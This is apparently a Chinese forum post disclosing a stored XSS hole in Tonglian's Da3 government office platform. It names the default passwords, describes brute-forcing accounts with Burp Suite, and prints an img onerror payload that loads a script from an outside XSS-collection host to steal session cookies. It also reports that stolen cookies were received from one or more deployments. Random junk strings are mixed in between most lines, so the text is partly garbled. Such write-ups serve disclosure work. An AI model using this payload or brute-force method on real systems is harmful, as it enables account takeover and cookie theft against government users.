( I1 j* B$ p/ H) b/ m/ Z; P' v0 M& [
! {6 e) l* Z+ ~8 q 同联Da3协同办公平台后台通用储存型xss漏洞 A5 r, R l$ e! {
9 g, y6 r- Y5 P8 _! b( D! u% \# P ' G4 P- Y# W- z5 ~6 v
平台简介:
8 x- X% Z7 K4 I( u7 z
- M0 t7 A( Q4 f3 L6 ] 6 r! W+ @5 i7 |% E5 M
& @" k" F6 d7 N
+ H1 X$ W" O5 f
7 d& T, w( F/ f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 C+ B+ q: d& P2 e# S" w
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
, Q V9 X3 A+ n
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!# q# w2 X6 }$ E
! j( x9 Z' s' H6 C 5 q' D& t C3 i* _
: S) z! t: F- j( k
$ Q2 Z0 C# N: R3 g/ m a! Y3 U# C
; E& u6 E% b9 }* E% @" k5 ~5 F# ^
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
! @' |, k# {7 ^( U" P& ^. R
}; h' ]) | \7 _6 n# X! B" g$ M2 L
: z8 f# \. j/ k+ |3 p Q0 i % [% ~) b, z3 y+ g! m b' l
1 J. K0 h3 H3 I/ L. p" l+ Q
, T4 e$ A' t; g http://1.1.1.1:7197/cap-aco/#(案例2-)
- @8 E9 f% Z; D, S
" Q- o; Z; }# M* L; C$ }. E
4 Z% x/ x2 E- O http://www.XXOO.com (案例1-官网网站)
& A9 A* Y* B+ z- c' X
* `$ f" o: O7 }7 G4 O
% P1 ^7 }! O! O1 V& N5 Y6 c 漏洞详情:
4 u, U& a8 O, Q; U
$ H% Q& P$ P. {3 ?6 w- ~
1 ?' N" ?3 W1 B3 |% I$ Q1 R) H 案例一、
5 D. w) A( {/ V4 x* i
0 v5 e2 H/ Y( r2 O& s. q
; f- u( h( i! V# h 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
) e1 b* E+ G) o) V
`6 B- N1 o% O4 J
" ]# O3 s, B( ^& ~8 J" l& g0 a( R 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
+ c' k6 x# ?4 E$ v
4 T3 a6 w# T% @2 D
% B6 [6 `# l' W6 x$ V, i4 y
4 U* W- s1 v$ ]! Y- h. c
* J8 G* G2 T1 E1 J9 P: A! m ) E9 F ^( n, \8 K
# t7 E$ ~) p( E2 W c
+ E$ E+ c+ w0 Q8 K1 h' B/ V5 l
1 N' G4 p+ j: R. H9 W status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ; K. w t4 e5 r8 k
# I" O4 s2 [+ c2 ~$ Y
8 I7 S; \0 z! E, w: [! @
8 O3 P* i0 R0 Y1 u
8 ^) L# j' ?: s0 e$ Q/ A; J
& H% Z0 U2 O+ x; R 
5 p, ?! d5 j @' n9 l
' j+ u7 e9 X+ _+ Z# l8 e/ G! T
8 W& I' s0 n" ~9 {. Z1 n 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 + r4 g0 n) ^. Z) j% ]8 u: W8 @
! @6 v" J1 t2 g2 j
3 X6 t C/ O3 P
B, j! M7 T& P
3 `2 b1 w0 [% N! U
& F8 H9 |' {) e0 H1 l1 K0 Y <img src=x6 I1 `7 |, p `2 k! _# ^
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 1 x7 J" h/ {) p3 J# e; D
, o, n t. b, v
; L! u% c' v+ J" X; { 
, K7 i& e* s: @' Q
1 z+ J( A* l3 V4 R- N, h0 ?
* q. R3 F/ w! W( r8 e 然后发送,接收cookie如图:
8 L' ?" k2 s- P$ v' e( Y; q
' j0 m/ h8 M1 a7 w' [: E9 {* p- A. g 5 R4 l+ z. }6 s9 s' C" C
/ T& G) f8 `3 k. R, o3 ^
4 l3 u& o/ x9 Y) s7 ~ K 9 z, O' _3 [0 _& }7 c4 F- g
. l; O6 v1 }5 P t0 `
$ E2 V e( w+ M+ R8 s4 Z! e
7 w: C9 _# l6 f- M2 E
8 R, A7 S" c# g2 ] ~" q
) n% Q1 J% `0 I' p \# U& O( X- N # j) T# c) N$ W; E
6 X& G8 D0 y W* t8 J2 S
/ \& P9 V" k1 K0 P% j2 g4 v. \4 z $ l8 I+ h2 `; F4 `3 v
5 w7 _7 L9 P6 X$ D
" ?+ c) c! ]+ U, u
9 N" w: y, i* C) C( G 
, B2 e& C4 l3 ` Z
' H9 ]7 j# |' i. p3 m/ S u
) i4 t. K' @ t 5 G& c/ H( s" m+ a* J
' W4 J* G/ h& j* u1 i# t) I
& d: n: j& C8 V; y$ Y- S: s8 N. O 案例2、
6 E( _+ H7 c( Z6 a
$ j5 x2 }/ Q! _6 e" S* Q1 I
! D1 a! d4 W2 V+ W- C6 Q5 U6 M) T 前面步骤都一样,下面看效果图: 7 P, q5 A" Y# I. b
7 f" y# K8 x9 c) O8 R
' w1 s7 w6 i: p" O4 S$ @
1 K1 n: e7 z( b J' |- J
$ {' o+ V3 N+ M" X( M; ]' s; H# F ' `5 r. h. E, n1 j# P- | v
0 B& T9 ?" z, J' X* v% i4 ?$ s
, \2 Y! s8 L" W
1 Y( b9 t" P9 H$ H: m; j8 r' f 2 e5 z2 z) Y) @ ^; {. y& r0 u
% y* ?: S$ `! `9 F2 l F
2 F6 J$ j8 |" T8 B5 q; { 6 R! E" J* P5 q( ~
8 N7 q/ l! Z2 D; H2 c5 z7 S: z
3 N7 T4 f4 F* F2 N; ^ 
) {+ r5 A0 e' [- g0 e
% W+ q: ~+ O/ K5 I4 q# c. j
v+ H. }: R7 S6 H5 U( O' m
7 E! o4 p8 ? z# V- m7 c. w
! r' J) x/ B! @; y3 ]) f8 f- L* F
- O% Z: i4 B+ q% ]+ M
+ w, p/ c1 h' e% |+ \3 R
/ Z) f" K# z" @( x
F! Q- w% b6 f9 @1 A
# t4 n4 c# E7 z7 ?1 w
. M( L6 l& d, b2 n% N$ L0 ^
$ M; n; a4 Q g8 C9 Z; \
# E- `! ^' \& x
. |) e5 E+ F( A8 c" U
发表于 2018-10-20 20:14:15
收藏
支持
反对